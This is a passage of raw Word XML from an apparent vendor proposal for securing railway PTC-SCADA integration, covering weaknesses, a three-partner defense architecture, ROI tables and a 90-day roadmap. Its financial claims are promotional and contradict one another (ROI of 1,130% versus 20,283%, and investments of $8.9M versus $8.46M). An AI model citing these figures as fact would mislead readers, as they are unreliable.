        </w:rPr>
        <w:t xml:space="preserve">PTC Integration Points</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>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Gateway: Single Windows server</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Database: SQL Server 2008 (EOL)</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API: REST over HTTP (not HTTPS)</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Trust: Implicit from SCADA</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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Safety Logic</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>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Override: SCADA can disable safety</w:t>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Validation: No cryptographic checks</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Logging: Can be modified post-fact</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Backup: Shares same vulnerabilities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rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_wgwywpa089sp" w:id="30"/>
      <w:bookmarkEnd w:id="30"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Defensive Architecture Revolution</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001FA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_mjesjei6wa1m" w:id="31"/>
      <w:bookmarkEnd w:id="31"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The Tri-Partner Safety-Security Solution</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001FB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[IMAGE: Revolutionary defense architecture on slate grey (#1A1F2E). Three-layer fortress design. Outer layer "NCC OTCE Assessment &amp; Architecture" - shows assessment teams, zero trust design, segmentation planning. Middle layer "Dragos Platform &amp; Monitoring" - displays protocol inspection, anomaly detection, threat hunting. Inner layer "Adelard Safety Validation" - illustrates SIL verification, fail-safe mechanisms, manual overrides. Show attacks being stopped at each layer. Include effectiveness metrics: 94% risk reduction, SIL-4 maintained, zero safety compromise.]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001FC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_9ij8o84wjc0g" w:id="32"/>
      <w:bookmarkEnd w:id="32"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Layer 1: NCC OTCE - Architectural Transformation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001FD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Assessment Phase</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>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1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">500-point PTC-SCADA evaluation</w:t>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Attack path modeling</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000201">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Risk quantification</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Regulatory gap analysis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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Design Phase</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>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Zero Trust rail architecture</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Protocol break implementation</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Segmentation strategy</w:t>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Migration planning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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Implementation Support</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>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Minimal disruption approach</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000020E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Safety validation throughout</w:t>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Testing and verification</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000210">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Knowledge transfer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000211">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_t3fj5mxgnpai" w:id="33"/>
      <w:bookmarkEnd w:id="33"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Layer 2: Dragos - Industrial Threat Detection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000212">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Platform Capabilities</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preser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PTC protocol deep inspection</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SCADA behavior analytics</w:t>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Integration point monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000217">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Asset inventory automation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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Threat Intelligence</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preser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Rail-specific threat feeds</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000021C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CARBIDE group tracking</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000021D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability correlation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000021E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Playbook automation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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Response Features</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>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Automated containment</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000223">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Forensic capabilities</w:t>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Recovery procedures</w:t>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Compliance reporting</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000226">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_o491fhw06m8k" w:id="34"/>
      <w:bookmarkEnd w:id="34"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Layer 3: Adelard - Safety Assurance</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000227">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Safety Maintenance</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SIL-4 verification during changes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000022A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Hazard analysis updates</w:t>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Fail-safe validation</w:t>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Emergency override testing</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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Integration Security</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>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1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Safety-security trade-offs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000231">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Risk assessment methodology</w:t>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Compliance documentation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000233">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Audit support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rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ai0y4ncd1373" w:id="35"/>
      <w:bookmarkEnd w:id="35"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ROI Analysis: The Business Case for Survival</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000237">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_9lt6bdrvj5o7" w:id="36"/>
      <w:bookmarkEnd w:id="36"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Financial Modeling</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000238">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[IMAGE: Comprehensive financial dashboard on dark grey (#1A1F2E). Four quadrants: 1) Cost of Inaction showing exponential risk growth reaching $1.8B by year 3. 2) Investment Timeline showing $8.9M total over 3 years with monthly breakdown. 3) Risk Reduction waterfall from $1.8B to $180M (90% reduction). 4) ROI metrics displaying 1,130% ROI, 3.2 month payback, $152M NPV. Include industry comparisons showing 40% lower cost than alternatives.]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000239">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ep1chg5qw8nb" w:id="37"/>
      <w:bookmarkEnd w:id="37"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Investment Breakdown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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">5-Year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b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">NCC OTCE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$2.0M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b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$540K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$3.96M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b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Adelard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$650K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$195K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$1.43M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b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$450K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$450K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b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Training &amp; Drills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$280K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$84K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$616K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b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Total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$4.38M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$1.02M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$8.46M</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000256">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_et6503gkkwke" w:id="38"/>
      <w:bookmarkEnd w:id="38"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Risk Mitigation Value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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Current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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Mitigated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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Value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b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Catastrophic Incident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$800M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$720M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b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Operational Disruption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$450M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$45M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$405M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b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Regulatory Fines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$125M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$120M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b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Reputation Damage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$275M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$245M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b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Insurance Increases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$130M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b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Total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$1.8B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$180M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$1.62B</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000273">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_yvvoxkyf8bqx" w:id="39"/>
      <w:bookmarkEnd w:id="39"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5-Year Financial Summary</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000274">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Investment: $8.46M</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Risk Reduction: $1.62B</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Operational Savings: $34M (automation, efficiency)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Insurance Premium Reduction: $45M (25% decrease)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Compliance Cost Avoidance: $23M</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Grant Funding Secured: $12M</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Net Benefit: $1.725B</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ROI: 20,283%</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Payback Period: 3.2 months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rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_wqzt2c85h27c" w:id="40"/>
      <w:bookmarkEnd w:id="40"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Implementation Roadmap</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000288">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_wbnhks38jiut" w:id="41"/>
      <w:bookmarkEnd w:id="41"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">90-Day Security Transformation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000289">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[IMAGE: Gantt chart timeline on white background (#FFFFFF). Three parallel tracks for NCC/Dragos/Adelard activities. Timeline shows weeks 1-13 with key milestones. Color coding: Assessment (blue #0080FF), Quick wins (green #00FF94), Platform deployment (amber #FFB800), Optimization (purple #9D4EDD). Risk reduction percentage shown at each milestone: 15%, 40%, 70%, 94%. Include dependencies and critical path highlighted.]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000028A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_20p5tw98k7eo" w:id="42"/>
      <w:bookmarkEnd w:id="42"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 1: Emergency Containment (Days 1-14)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000028B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Isolate PTC from SCADA networks</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000028C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Deploy emergency monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000028D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Inventory all integration points</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000028E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Risk Reduction</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: 15%</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000028F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_7thv494oxyl6" w:id="43"/>
      <w:bookmarkEnd w:id="43"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 2: Rapid Hardening (Days 15-30)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000290">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Implement protocol breaks</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000291">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Deploy Dragos sensors</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000292">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
